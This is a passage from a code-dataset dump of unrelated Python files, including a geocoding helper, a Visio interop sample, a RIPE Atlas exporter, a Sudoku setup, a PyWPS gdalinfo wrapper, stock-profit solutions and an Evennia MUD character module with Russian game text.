GoogleV3(os.environ['api_google_key'])\n res = str(geo.geocode(f\"{self.lat}, {self.long}\"))\n street = res.split(',')\n geolocator = Nominatim(user_agent=os.environ['google_user_agent'])\n location = geolocator.geocode(f\"{street[0]}, {street[1]}, {street[2]}\")\n return 
location.address\n\n\n","sub_path":"processor/imageMetadata/coordinates_metadata.py","file_name":"coordinates_metadata.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"96301859","text":"import json\nclass RoboConfig():\n def __init__(self,cfg_file = \"./config.cfg\"):\n self.cfg_file = cfg_file\n def load(self):\n with open(self.cfg_file,\"r\") as f:\n cfg = f.read()\n if cfg:\n self.cfg = json.loads(cfg)\n def dump(self):\n with open(self.cfg_file,\"w\") as f:\n f.write(json.dumps(self.cfg))\n def reset(self):\n self.cfg = {\n \"cap\":0,\n \"isVideo\":False,\n \"isRecord\":False,\n \"recordPath\":\"./record\",\n \"red_config\":{\n \"hmin\":4,\n \"hmax\":17,\n \"smin\":203,\n \"smax\":360,\n \"vmin\":27,\n \"vmax\":258,\n \"thre1\":5,\n \"thre2\":11,\n \"ratio_min\":1,\n \"ratio_max\":9,\n \"offset_x\":150,\n \"offset_y\":0\n },\n \"blue_config\":{\n \"hmin\":111,\n \"hmax\":180,\n \"smin\":228,\n \"smax\":360,\n \"vmin\":22,\n \"vmax\":360,\n \"thre1\":5,\n \"thre2\":27,\n \"ratio_min\":1,\n \"ratio_max\":9,\n \"offset_x\":150,\n \"offset_y\":0\n }\n\n }\n def getcfg(self):\n return self.cfg\n def setColorConfig(self,mode = \"red\",color_cfg = None):\n if not color_cfg:\n return None\n self.cfg[mode + \"_config\"] = color_cfg\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"523196702","text":"import clr \nimport System \n\nclr.AddReference(\"Microsoft.Office.Interop.Visio\") \nimport Microsoft.Office.Interop.Visio \nIVisio = Microsoft.Office.Interop.Visio \n\nfrom Records import *\nimport Util\n\ndef Shape_GetFormulas( doc ):\n\n pages = doc.Pages\n page = pages.Add()\n page.NameU = \"SGF\"\n \n shape = page.DrawRectangle(1, 1, 4, 3)\n shape.CellsU[\"Width\"].Formula = \"=(1.0+2.5)\"\n shape.CellsU[\"Height\"].Formula = \"=(0.0+1.5)\"\n\n # BUILD UP THE REQUEST\n items = [\n Shape_GetFormulas_Record(IVisio.VisSectionIndices.visSectionObject, IVisio.VisRowIndices.visRowXFormOut, IVisio.VisCellIndices.visXFormWidth),\n Shape_GetFormulas_Record(IVisio.VisSectionIndices.visSectionObject, IVisio.VisRowIndices.visRowXFormOut, IVisio.VisCellIndices.visXFormHeight)\n ]\n\n # MAP THE REQUEST TO THE STRUCTURES VISIO EXPECTS\n SRCStream = Util.get_new_system_array(System.Int16, len(items)*3)\n for i in xrange(len(items)) :\n SRCStream[i * 3 + 0] = items[i].SectionIndex\n SRCStream[i * 3 + 1] = items[i].RowIndex\n SRCStream[i * 3 + 2] = items[i].CellIndex\n\n # EXECUTE THE REQUEST\n formulas_sa = Util.get_outref_to_system_array(System.Object) \n SRCStream_sa = Util.get_ref_to_system_array(System.Int16,SRCStream) \n shape.GetFormulasU(SRCStream_sa, formulas_sa)\n\n # OUTPUT BACK TO SOMETHING USEFUL \n formulas = Util.get_new_system_array(System.String,formulas_sa.Length)\n formulas_sa.CopyTo(formulas, 0);\n\n shape.Text = System.String.Format(\"Formulas={0},{1}\", formulas[0], formulas[1])\n\n","sub_path":"DotNet/managed_code_interop_vs2010/VS2010_IronPython_Samples/Shape_GetFormulas.py","file_name":"Shape_GetFormulas.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"243268841","text":"import ReID_Dataloader\nfrom person_reid_model import PersonReID\n\n\nweights_path = './model/weights.h5'\ngpu_list = '0'\nperson_reid_extractor = PersonReID(gpu_list=gpu_list, 
weight_file=weights_path)\n\ndataset = ReID_Dataloader.ReID_Dataset(dataset='combined')\ntrainset, testsets = dataset.create_dataset()\n\nfor testset_name, testset in testsets.items():\n testset.set_feat_func(person_reid_extractor.feature_extraction)\n print('\\n=========> Test on dataset: {} <=========\\n'.format(testset_name))\n testset.eval()\n\n","sub_path":"ReID_Combine.py","file_name":"ReID_Combine.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"233415628","text":"import json\nimport argparse\nimport os\nfrom ripe.atlas.cousteau import Probe, Measurement\nfrom collections import defaultdict\n\n\"\"\" export-to-ixp-jedi.py\n Takes the set of files created by an IP Topology Map run and converts\n them to the structure expected by the IXP Country Jedi to generate the\n visualization and analysis\n\"\"\"\n\ndef dpath(fname):\n return os.path.join(args.datadir, fname)\n\ndef epath(fname):\n return os.path.join(args.exportdir, fname)\n\n\nparser = argparse.ArgumentParser(\"Exports IP Topology Map datafiles into IXP \"\n \"Country Jedi format\")\nparser.add_argument('--datadir', required=True,\n help=\"directory to read files\")\nparser.add_argument('--exportdir', required=True,\n help=\"Directory to save files\")\nargs = parser.parse_args()\n\n\n# Step 1: Read config file and generate config file\nprint(\"Exporting config\")\nif os.path.isfile(epath('config.json')):\n print(\"\\tSkipping, config already exists\")\nelse:\n with open(dpath('config.json')) as in_conf, open(epath('config.json'),\n 'wb') as out_conf:\n config = json.load(in_conf)\n new_conf = {'country': config['PrimaryCountry']}\n json.dump(new_conf, out_conf)\n\n# Step 2: Generate the list of probes\nprint(\"Exporting probe info\")\nif os.path.isfile(epath('probeset.json')):\n print(\"\\tSkipping, probeset already exists\")\nelse:\n with open(dpath('probes.json')) as in_prb, \\\n open(epath('probeset.json'), 'wb') as out_prb:\n in_prb_set = json.load(in_prb)\n out_prb_set = []\n for cc, probe_list in in_prb_set.iteritems():\n for prb in probe_list:\n # Fetch the full info from the probe as we don't keep as much as IXP\n # Jedi needs\n probe_info = Probe(id=prb['id'])\n out_prb_set.append({'country_code': cc,\n 'dists': {},\n 'tags': probe_info.tags,\n 'asn_v4': probe_info.asn_v4,\n 'asn_v6': probe_info.asn_v6,\n 'address_v4': probe_info.address_v4,\n 'address_v6': probe_info.address_v6,\n 'probe_id': probe_info.id,\n 'lat': probe_info.geometry['coordinates'][0],\n 'lon': probe_info.geometry['coordinates'][1]\n })\n\n json.dump(out_prb_set, out_prb)\n\nif os.path.isfile(epath('measurementset.json')):\n print(\"\\tSkipping, measurement file already exists\")\nelse:\n # Step 3a: Read the list of measurements and identify the ones corresponding\n # to the probe-mesh\n print(\"Finding measurements\")\n stage_msm = defaultdict(list)\n with open(dpath('measurements.json')) as in_msm_file:\n msm_dict = json.load(in_msm_file)\n for cc, msm_list in msm_dict.iteritems():\n for msm_id in msm_list:\n msm_info = Measurement(id=msm_id)\n tag, descr = msm_info.description.split(':')\n stage = tag.split('_')[-1]\n stage_msm[stage].append(msm_id)\n\n print(\"Exporting measurements\")\n new_msm_set = set()\n with open(dpath('results.json')) as in_msm_file, \\\n open(epath('measurementset.json'), 'wb') as out_msm_file:\n in_msm = json.load(in_msm_file)\n for cc, msm_list in in_msm.iteritems():\n for old_msm in msm_list:\n if old_msm['msm_id'] in 
stage_msm['S1']:\n new_msm_set.add((old_msm['dst_name'], old_msm['msm_id']))\n\n print(\"%d measurements to save\" % len(new_msm_set))\n json.dump({'v6': [],\n 'v4': [{'dst': d,\n 'msm_id': m,\n 'type': 'probe-mesh'} for d, m in new_msm_set]},\n out_msm_file)\n\n# Step 4, export the information we have about IXs in the country and feed it\n# into basedata\nprint(\"Exporting updated basedata\")\npeering_lan = {}\nbase = {}\nwith open(dpath('peeringdb-dump.json')) as in_pdb_file,\\\n open(epath('basedata.json')) as in_base_file:\n pdb = json.load(in_pdb_file)\n base = json.load(in_base_file)\n # Iterate over the list of IXs and generate a structure suitable for\n # basedata\n for ix in pdb:\n if ix['country'] in base['countries']:\n peering_lan[ix['name']] = {'peeringlans': ix['ixpfx']}\n\n# Overwrite the ixps entry in the basedata\nbase['ixps'] = peering_lan\nwith open(epath('basedata.json'), 'wb') as out_base_file:\n json.dump(base, out_base_file, indent=2)\n","sub_path":"export-to-ixp-jedi.py","file_name":"export-to-ixp-jedi.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"556103902","text":"import tensorflow as tf\nfrom tensorflow.contrib.layers import flatten\nfrom .traffic_data import TrafficDataSets\nfrom .data_explorer import TrainingPlotter\nimport logging.config\nlogging.config.fileConfig('logging.conf')\n\nclass Lenet(object):\n\n def __init__(self, traffic_dataset, name, epochs=100, batch_size=500):\n self.plotter = TrainingPlotter(\"Lenet \" + name,\n './model_comparison/Lenet_{}_{}.png'.format(name, TrainingPlotter.now_as_str()),\n show_plot_window=False)\n self.epochs = epochs\n self.batch_size = batch_size\n self.label_size = TrafficDataSets.NUMBER_OF_CLASSES\n\n self.traffic_datas = traffic_dataset\n\n logging.info(\"training data {}\".format(len(traffic_dataset.train.images)))\n\n # consists of 32x32xcolor_channel\n color_channel = traffic_dataset.train.images.shape[3]\n self.x = tf.placeholder(tf.float32, (None, 32, 32, color_channel))\n\n self.y = tf.placeholder(tf.float32, (None, self.label_size))\n self.network = Lenet._LeNet(self, self.x, color_channel)\n\n self.loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(self.network, self.y))\n self.opt = tf.train.AdamOptimizer()\n self.train_op = self.opt.minimize(self.loss_op)\n\n # LeNet architecture:\n # INPUT -> CONV -> ACT -> POOL -> CONV -> ACT -> POOL -> FLATTEN -> FC -> ACT -> FC\n # create the LeNet and return the result of the last fully connected layer.\n def _LeNet(self, x, color_channel):\n # x is 32, 32, 3\n # Reshape from 2D to 4D. This prepares the data for\n # convolutional and pooling layers.\n # x = tf.reshape(x, (-1, 32, 32, 3))\n # Pad 0s to 32x32. 
Centers the digit further.\n # Add 2 rows/columns on each side for height and width dimensions.\n # x = tf.pad(x, [[0, 0], [2, 2], [2, 2], [0, 0]], mode=\"CONSTANT\")\n\n # 28x28x6\n conv1_W = tf.Variable(tf.truncated_normal(shape=(5, 5, color_channel, 6)))\n conv1_b = tf.Variable(tf.zeros(6))\n conv1 = tf.nn.conv2d(x, conv1_W, strides=[1, 1, 1, 1], padding='VALID') + conv1_b\n\n conv1 = tf.nn.relu(conv1)\n\n # 14x14x6\n conv1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n # 10x10x16\n conv2_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 6, 16)))\n conv2_b = tf.Variable(tf.zeros(16))\n conv2 = tf.nn.conv2d(conv1, conv2_W, strides=[1, 1, 1, 1], padding='VALID') + conv2_b\n\n conv2 = tf.nn.relu(conv2)\n\n # 5x5x16\n conv2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n # Flatten\n fc1 = flatten(conv2)\n # (5 * 5 * 16, 120)\n fc1_shape = (fc1.get_shape().as_list()[-1], 512)\n\n fc1_W = tf.Variable(tf.truncated_normal(shape=(fc1_shape)))\n fc1_b = tf.Variable(tf.zeros(512))\n fc1 = tf.matmul(fc1, fc1_W) + fc1_b\n fc1 = tf.nn.relu(fc1)\n\n fc2_W = tf.Variable(tf.truncated_normal(shape=(512, self.label_size)))\n fc2_b = tf.Variable(tf.zeros(self.label_size))\n return tf.matmul(fc1, fc2_W) + fc2_b\n\n def eval_data(self, dataset):\n \"\"\"\n Given a dataset as input returns the loss and accuracy.\n \"\"\"\n # If dataset.num_examples is not divisible by BATCH_SIZE\n # the remainder will be discarded.\n # Ex: If BATCH_SIZE is 64 and training set has 55000 examples\n # steps_per_epoch = 55000 // 64 = 859\n # num_examples = 859 * 64 = 54976\n #\n # So in that case we go over 54976 examples instead of 55000.\n correct_prediction = tf.equal(tf.argmax(self.network, 1), tf.argmax(self.y, 1))\n accuracy_op = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n steps_per_epoch = dataset.num_examples // self.batch_size\n num_examples = steps_per_epoch * self.batch_size\n total_acc, total_loss = 0, 0\n sess = tf.get_default_session()\n for step in range(steps_per_epoch):\n batch_x, batch_y = dataset.next_batch(self.batch_size)\n loss, acc = sess.run([self.loss_op, accuracy_op], feed_dict={self.x: batch_x, self.y: batch_y})\n total_acc += (acc * batch_x.shape[0])\n total_loss += (loss * batch_x.shape[0])\n return total_loss / num_examples, total_acc / num_examples\n\n def train(self):\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n steps_per_epoch = self.traffic_datas.train.num_examples // self.batch_size\n\n # Train model\n for i in range(self.epochs):\n for step in range(steps_per_epoch):\n batch_x, batch_y = self.traffic_datas.train.next_batch(self.batch_size)\n loss = sess.run(self.train_op, feed_dict={self.x: batch_x, self.y: batch_y})\n self.plotter.add_loss_accuracy_to_plot(i, loss, None, None, None, redraw=False)\n\n val_loss, val_acc = self.eval_data(self.traffic_datas.validation)\n logging.info(\"EPOCH {} Validation loss = {:.3f} accuracy = {:.3f}\".format(i + 1, val_loss, val_acc))\n self.plotter.add_loss_accuracy_to_plot(i, loss, None, val_loss, val_acc, redraw=True)\n\n # Evaluate on the test data\n test_loss, test_acc = self.eval_data(self.traffic_datas.test)\n logging.info(\"Test loss = {:.3f} accuracy = {:.3f}\".format(test_loss, test_acc))\n\n self.plotter.safe_shut_down()\n","sub_path":"traffic/traffic_lenet.py","file_name":"traffic_lenet.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} 
+{"seq_id":"639984335","text":"rows = 'ABCDEFGHI'\ncols = '123456789'\n\ngrid1 = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\ngrid2 = '9.1....8.8.5.7..4.2.4....6...7......5..............83.3..6......9................'\ngrid3 = '1....................2......3.....4..............5.......6.....7..8.............9'\n\n# helper function:\n# given two strings (a and b), func will return the list formed by all the\n# possible concatenations of a letter s in string a with a letter t in string b\ndef cross(a,b):\n return [s+t for s in a for t in b]\n\nboxes = cross(rows, cols)\n# returns sudoku board\n\nrow_units = [cross(r, cols) for r in rows]\n# element example:\n# row_units[0] = ['A1', 'A2', 'A3', 'A4', 'A5', 'A6', 'A7', 'A8', 'A9']\n\ncolumn_units = [cross(rows, c) for c in cols]\n# element example:\n# column_units[0] = ['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1', 'H1', 'I1']\n\nsquare_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]\n# element example:\n# square_units[0] = ['A1', 'A2', 'A3', 'B1', 'B2', 'B3', 'C1', 'C2', 'C3']\n\ndiagonal_units = [[r+c for r,c in zip(rows,cols)],[r+c for r,c in zip(rows, cols[::-1])]]\n# element example:\n# diagonal_units[0] = ['A1', 'B2', 'C3', 'D4', 'E5', 'F6', 'G7', 'H8', 'I9']\n\n\nunitlist = row_units + column_units + square_units + diagonal_units\nunits = dict((s, [u for u in unitlist if s in u]) for s in boxes)\npeers = dict((s, set(sum(units[s],[]))-set([s])) for s in boxes)\n# set is an unordered collection of items. Every element is unique\n# (no duplicates) and must be immutable (which cannot be changed)\n# sum adds the items of an iterable and returns the sum\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"59443721","text":"import subprocess\nfrom pathlib import Path\n\nfrom pywps import FORMATS, UOM\nfrom pywps.app import Process\nfrom pywps.inout import LiteralOutput\nfrom .process_defaults import process_defaults, LiteralInputD\nfrom pywps.app.Common import Metadata\nfrom pywps.response.execute import ExecuteResponse\nfrom processes import process_helper\nimport processes.io_generator as iog\n\nimport osgeo\n\n\nclass GdalInfo(Process):\n def __init__(self):\n process_id = 'gdalinfo'\n defaults = process_defaults(process_id)\n\n inputs = iog.p(defaults, default='--formats')\n\n outputs = [LiteralOutput('output', 'gdalinfo output', data_type='string')]\n\n super().__init__(\n self._handler,\n identifier=process_id,\n version='1.0.0',\n title='gdalinfo',\n abstract='gdalinfo',\n profile='',\n metadata=[Metadata('raster', 'vector')],\n inputs=inputs,\n outputs=outputs,\n store_supported=True,\n status_supported=True\n )\n\n def _handler(self, request, response: ExecuteResponse):\n p = process_helper.get_input_data_array(request.inputs['p'])\n\n osgeo_path = Path(osgeo.__file__).parent\n gdalinfo_path = osgeo_path / \"gdalinfo\"\n output = subprocess.Popen([gdalinfo_path, *p], stdout=subprocess.PIPE).communicate()[0].decode(\"utf-8\")\n\n response.outputs['output'].data_format = FORMATS.JSON\n response.outputs['output'].data = output\n\n return response\n","sub_path":"processes/gdalinfo.py","file_name":"gdalinfo.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"271876131","text":"'''\nSay you have an array for which the ith element is the 
price of a given stock on day i.\n\nIf you were only permitted to complete at most one transaction (i.e., buy one and sell one share of the stock), design an algorithm to find the maximum profit.\n\nNote that you cannot sell a stock before you buy one.\n\nExample 1:\n\nInput: [7,1,5,3,6,4]\nOutput: 5\nExplanation: Buy on day 2 (price = 1) and sell on day 5 (price = 6), profit = 6-1 = 5.\n Not 7-1 = 6, as selling price needs to be larger than buying price.\nExample 2:\n\nInput: [7,6,4,3,1]\nOutput: 0\nExplanation: In this case, no transaction is done, i.e. max profit = 0.\n\n'''\n\n\n#O(n^2) time, O(1) space\ndef maxProfit_BruteForce(prices):\n maxProfit = 0 \n for i in range(len(prices)): \n for j in range(i+1, len(prices)): \n profit = prices[j] - prices[i]\n if profit > maxProfit: \n maxProfit = profit \n return maxProfit \n\n#O(n) time (single loop), O(1) space (two variables)\ndef maxProfit(prices): \n if len(prices) > 0: \n lowest,profit = prices[0],0\n for i in range(1,len(prices)): \n if prices[i] < lowest: \n lowest = prices[i]\n elif ((prices[i] - lowest) > profit): \n profit = prices[i] - lowest\n else: \n profit = 0 \n \n return profit \n\n#O(n) time, O(1) space\ndef maxProfit2(prices): \n profit,low = 0, float('inf') \n for curr_price in prices: \n if curr_price < low: \n low = curr_price \n else: \n profit = max(curr_price-low,profit)\n return profit\n\np = [7,1,5,3,6,4]\n#returns 5 since it's the max profit\n#print(maxProfit(p)) \n#print(maxProfit_BruteForce(p))\nprint(maxProfit2(p))\n\n''' \ncheck if there are prices in the list\nset the lowest to the first element of the list and initialize profit \nloop through the second element of the list to the end \n if the curr element of the list is less than the first element of the list,\n set lowest to that \n if not then, check if the curr element of the list minus the lowest (first ele) is more than\n profit, if so set profit to that\nelse if there are no prices, return profit 0 since it is the biggest \nreturn profit \n''' ","sub_path":"LeetCode/BestTimetoBuy&SellStocks.py","file_name":"BestTimetoBuy&SellStocks.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"247258259","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCharacters\n\nCharacters are (by default) Objects setup to be puppeted by Players.\nThey are what you \"see\" in game. 
The Character class in this module\nis setup to be the \"default\" character type created by the default\ncreation commands.\n\n\"\"\"\nfrom evennia import DefaultCharacter\nimport random\nfrom typeclasses.objects import Object\nfrom evennia import create_object\nfrom django.conf import settings\nfrom evennia import TICKER_HANDLER as tickerhandler\nfrom evennia.utils import delay\nfrom evennia import gametime\n\nclass Character(DefaultCharacter):\n \"\"\"\n The Character defaults to implementing some of its hook methods with the\n following standard functionality:\n\n at_basetype_setup - always assigns the DefaultCmdSet to this object type\n (important!)sets locks so character cannot be picked up\n and its commands only be called by itself, not anyone else.\n (to change things, use at_object_creation() instead)\n at_after_move - launches the \"look\" command\n at_post_puppet(player) - when Player disconnects from the Character, we\n store the current location, so the \"unconnected\" character\n object does not need to stay on grid but can be given a\n None-location while offline.\n at_pre_puppet - just before Player re-connects, retrieves the character's\n old location and puts it back on the grid with a \"charname\n has connected\" message echoed to the room\n\n \"\"\"\n #religions\n avaible_religions = [\"христианство\",\"буддизм\",\"сатанизм\",\"масульманизм\"]\n poket_money_amount = 10\n\n def at_object_creation(self):\n #attach hands\n self.db.hands = create_object(settings.BASE_OBJECT_TYPECLASS, \"hands\")\n #attach frag counter\n self.db.frags = 0\n #attach death count\n self.db.death_count = 0\n #attach the effects dict\n self.db.effects = {} \n #association with the character's flat.\n self.db.flat = None\n #attach party\n self.db.party = []\n #attach party leader\n self.db.party_leader = None\n #attach money\n self.db.money = 3\n #attach religion\n self.db.religion = \"атеист\"\n #attach previous location\n self.db.last_location = None\n\n def return_appearance(self, looker):\n \"\"\"\n This formats a description. It is the hook a 'look' command\n should call.\n\n Args:\n looker (Object): Object doing the looking.\n \"\"\"\n if not looker:\n return\n # get and identify all objects\n visible = (con for con in self.contents if con != looker and\n con.access(looker, \"view\"))\n exits, users, things = [], [], []\n for con in visible:\n key = con.get_display_name(looker)\n if con.destination:\n exits.append(key)\n elif con.has_player:\n users.append(\"{c%s{n\" % key)\n else:\n things.append(key)\n\n in_hands = (con for con in self.db.hands.contents if con != looker and\n con.access(looker, \"view\"))\n thing = []\n for con in in_hands:\n key = con.get_display_name(looker)\n if con:\n thing.append(key) \n # get description, build string\n string = \"{c%s{n\\n\" % self.get_display_name(looker)\n desc = self.db.desc\n if desc:\n string += \"%s\" % desc\n if exits:\n string += \"\\n{wВыходы:{n \" + \", \".join(exits)\n if users or things:\n string += \"\\n{wТы видишь:{n \" + \", \".join(users + things)\n if thing:\n string += \"\\n{wВ руках:{n \" + \", \".join(thing)\n return string\n\n\n def at_after_move(self, source_location):\n super(Character, self).at_after_move(source_location) \n if self.location.key == (u\"Сычевальня\"):\n bugurts = [u\"ПОЧЕМУ У МЕНЯ НЕТ ТЯН... 
\n\n    def return_appearance(self, looker):\n        \"\"\"\n        This formats a description. It is the hook a 'look' command\n        should call.\n\n        Args:\n            looker (Object): Object doing the looking.\n        \"\"\"\n        if not looker:\n            return\n        # get and identify all objects\n        visible = (con for con in self.contents if con != looker and\n                   con.access(looker, \"view\"))\n        exits, users, things = [], [], []\n        for con in visible:\n            key = con.get_display_name(looker)\n            if con.destination:\n                exits.append(key)\n            elif con.has_player:\n                users.append(\"{c%s{n\" % key)\n            else:\n                things.append(key)\n\n        in_hands = (con for con in self.db.hands.contents if con != looker and\n                    con.access(looker, \"view\"))\n        thing = []\n        for con in in_hands:\n            key = con.get_display_name(looker)\n            if con:\n                thing.append(key)\n        # get description, build string\n        string = \"{c%s{n\\n\" % self.get_display_name(looker)\n        desc = self.db.desc\n        if desc:\n            string += \"%s\" % desc\n        if exits:\n            string += \"\\n{wВыходы:{n \" + \", \".join(exits)\n        if users or things:\n            string += \"\\n{wТы видишь:{n \" + \", \".join(users + things)\n        if thing:\n            string += \"\\n{wВ руках:{n \" + \", \".join(thing)\n        return string\n\n\n    def at_after_move(self, source_location):\n        super(Character, self).at_after_move(source_location)\n        if self.location.key == (u\"Сычевальня\"):\n            bugurts = [u\"ПОЧЕМУ У МЕНЯ НЕТ ТЯН... РАЗВЕ Я ТАК МНОГО ПРОШУ...\", u\"ТРИЖДЫБЛЯДСКАЯ ЯРОСТЬ\"]\n            self.execute_cmd(\"сказать \" + random.choice(bugurts))\n\n        # walks out of the window if under the influence\n        if self.location.key == (u\"Сычевальня\"):\n            if self.db.effects:\n                if len(self.db.effects) > 0:\n                    out = self.search(\"Преддворая территория\",global_search=True,quiet=True)\n                    if out:\n                        dest = out[0]\n                        self.move_to(dest,quiet=True)\n                        self.msg(\"Ты был под веществами. Ты перепутал окно с ковром и вышел в него.\")\n                        self.at_die()\n                    else:\n                        self.msg(\"Ты был под веществами. Тебе привиделась Алиска и вы вскрылись.\")\n                        self.at_die()\n\n        # receive the daily pocket money from mom\n        your_mom = self.search(True, location=self.location, attribute_name = 'is_mom', quiet=True)\n        if your_mom:\n            mom = your_mom[0]\n            if (gametime.gametime() - mom.db.last_payout) >= (24*60)*60:\n                self.db.money = self.db.money + self.poket_money_amount\n                self.msg(\"Мамка дала тебе %s денег.\" % self.poket_money_amount)\n                mom.db.last_payout = gametime.gametime()\n\n    def announce_move_from(self, destination):\n        \"\"\"\n        Called if the move is to be announced. This is\n        called while we are still standing in the old\n        location.\n\n        Args:\n            destination (Object): The place we are going to.\n\n        \"\"\"\n        if not self.location:\n            return\n        name = self.name\n        loc_name = self.location.name\n        dest_name = destination.name\n        string = \"%s уходит из %s, направляясь в %s.\"\n        self.location.msg_contents(string % (name, loc_name, dest_name), exclude=self)\n\n        # remember the previous location\n        self.db.last_location = self.location\n\n\n    def announce_move_to(self, source_location):\n        \"\"\"\n        Called after the move if the move was not quiet. At this point\n        we are standing in the new location.\n\n        Args:\n            source_location (Object): The place we came from\n\n        \"\"\"\n\n        name = self.name\n        if not source_location and self.location.has_player:\n            # This was created from nowhere and added to a player's\n            # inventory; it's probably the result of a create command.\n            string = \"Теперь у тебя есть в распоряжении %s.\" % name\n            self.location.msg(string)\n            return\n\n        src_name = \"nowhere\"\n        loc_name = self.location.name\n        if source_location:\n            src_name = source_location.name\n        string = \"%s пришел в %s из %s.\"\n        self.location.msg_contents(string % (name, loc_name, src_name), exclude=self)\n        # handle the party: followers are dragged along with their leader\n        party = self.db.party\n        if party:\n            for member in party:\n                player = self.search(member, global_search=True,nofound_string=\"Сопартиец %s не найден!\" % member)\n                if not player:\n                    return\n                if player and player.has_player:\n                    player.location.msg_contents(\"%s последовал за лидером %s\" % (player.key, self.key))\n                    player.move_to(self.location)\n                    player.msg(\"Ты последовал за лидером - %s. Вы отправились в %s\" % (self.key, self.location.name))
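\n\n    # Death is a two-step sequence: at_die() below handles the corpse, loot\n    # and party bookkeeping right away, then TelToLimb() fires after a short\n    # delay to move the character off the grid.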
\n\n    def at_die(self):\n        \"\"\"\n        Player death hook. Creates a corpse, dumps the player's items and\n        money into it, and moves the player to limbo.\n        \"\"\"\n        # create the corpse\n        corpse = create_object(Corpse,self.key, location=self.location)\n        # money\n        if self.db.money:\n            corpse.db.money = self.db.money\n            self.db.money = 0\n        #corpse.key = \"Труп %s\" % self.key\n        descriptions = [\"Изуродованный труп %s\" % self.key,\n                        \"Бренное тело %s\" % self.key,\n                        \"Останки %s\" % self.key,\n                        \"Все, что оcталось от %s\" % self.key]\n        corpse.db.desc = random.choice(descriptions)\n        # dump the items into it\n        items = self.contents\n        if items:\n            for item in items:\n                item.move_to(corpse, quiet=True)\n        if self.db.hands:\n            in_hands = self.db.hands.contents\n            if in_hands:\n                item = in_hands[0]\n                item.move_to(corpse,quiet=True)\n        # disband the party if you died, or leave it if the leader died\n        leader = self.db.party_leader\n        party = self.db.party\n\n        if party:\n            for member in party:\n                player = self.search(member, global_search=True,nofound_string=\"Сопартиец %s не найден!\" % member)\n                if not player:\n                    return\n                player.db.party_leader = None\n                player.msg(\"Ваш лидер погиб и ваша группа распалась.\")\n            self.db.party = []\n            self.msg(\"Твоя группа распалась.\")\n\n        if leader:\n            your_leader = self.search(leader, global_search=True,nofound_string=\"Лидер %s не найден!\" % leader)\n            your_leader.db.party.remove(self.key)\n            your_leader.msg(\"%s погиб и вышел и твой группы.\" % self.key)\n            self.db.party_leader = None\n            self.msg(\"Ты покинул группу %s\" % your_leader.key)\n\n        # delay before the teleport\n        delay(5, callback=self.TelToLimb)\n\n    def TelToLimb(self):\n        # teleport the character to limbo\n        #limbs = self.search(\"Limbo\", global_search=True, quiet=True,nofound_string=\"Бога нет, и рая нет!\" )\n        limbs = self.search(True, global_search=True, attribute_name = 'after_death', quiet=True,nofound_string=\"Бога нет, и рая нет!\" )\n\n        if limbs:\n            limb = limbs[0]\n            self.move_to(limb, quiet=True)\n        else:\n            self.msg(\"Ты не смог попасть в рай. Потому что его нет! Где твой Бог теперь?\")\n\n\n\nclass Corpse(Character):\n    \"\"\"\n    A player's corpse. Created when a player dies; it disappears after\n    3 minutes.\n    \"\"\"\n    def at_object_creation(self):\n        self.db.is_corpse = True\n        self.db.hands = create_object(settings.BASE_OBJECT_TYPECLASS, \"hands\")\n        # start the corpse decay timer\n        tickerhandler.add(self, 60*3)\n    def at_tick(self):\n        # destroy all carried items and remove the corpse itself\n        self.location.msg_contents(\"Прах игрока %s исчезает у тебя на глазах\" % self.key)\n        items = self.contents\n        if items:\n            for item in items:\n                item.delete()\n        self.delete()
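\n\n    # tickerhandler.add(self, 60*3) makes Evennia call at_tick every 180\n    # seconds, so the first tick after creation is what removes the corpse.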
\n\n    def return_appearance(self, looker):\n        \"\"\"\n        This formats a description. It is the hook a 'look' command\n        should call.\n\n        Args:\n            looker (Object): Object doing the looking.\n        \"\"\"\n        if not looker:\n            return\n        # get and identify all objects\n        visible = (con for con in self.contents if con != looker and\n                   con.access(looker, \"view\"))\n        exits, users, things = [], [], []\n        for con in visible:\n            key = con.get_display_name(looker)\n            if con.destination:\n                exits.append(key)\n            elif con.has_player:\n                users.append(\"{c%s{n\" % key)\n            else:\n                things.append(key)\n        thing = []\n        if self.db.hands:\n            in_hands = (con for con in self.db.hands.contents if con != looker and\n                        con.access(looker, \"view\"))\n            for con in in_hands:\n                key = con.get_display_name(looker)\n                if con:\n                    thing.append(key)\n        # get description, build string\n        string = \"{C%s{n\\n\" % self.get_display_name(looker)\n        desc = self.db.desc\n        if desc:\n            string += \"%s\" % desc\n        if exits:\n            string += \"\\n{wВыходы:{n \" + \", \".join(exits)\n        if users or things:\n            string += \"\\n{wТы видишь:{n 